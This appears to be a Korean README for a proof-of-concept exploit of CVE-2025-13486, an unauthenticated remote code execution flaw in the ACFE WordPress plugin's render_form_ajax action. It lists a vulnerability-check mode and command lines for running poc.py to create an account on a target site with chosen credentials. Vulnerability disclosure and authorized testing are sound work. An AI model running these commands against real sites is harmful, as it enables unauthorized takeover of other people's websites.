
CVE-2025-13486용 POC
CVE-2025-13486에 대한 개념 증명(PoC) 익스플로잇으로, Advanced Custom Fields: Extended (ACFE) WordPress 플러그인의 원격 코드 실행 취약점입니다.
이 취약점은 ACFE 버전 0.9.0.5부터 0.9.1.1까지 존재하며, 인증되지 않은 공격자가 acfe/form/render_form_ajax AJAX 액션을 통해 임의의 PHP 함수를 실행할 수 있게 합니다. 플러그인은 사용자 입력을 적절히 검증하지 않고 call_user_func_array()를 사용합니다.
print_r을 사용하여 대상이 취약한지 안전하게 확인 (비파괴적)pip install requests
python poc.py -u http://target-site.com --verify
# With random credentials (displayed after execution)
python poc.py -u http://target-site.com
# With custom credentials
python poc.py -u http://target-site.com --user admin123 --password P@ssw0rd! --email [email protected]
-u, --url Target WordPress URL (required)
--verify Only verify vulnerability (safer, uses print_r)
--user Username to create (default: random)
--password Password to set (default: random)
--email Email address to set (default: random)
이 PoC는 교육 및 승인된 보안 테스트 목적으로만 제공됩니다. 컴퓨터 시스템에 대한 무단 액세스는 불법입니다. 테스트 전에 항상 적절한 승인을 받으십시오.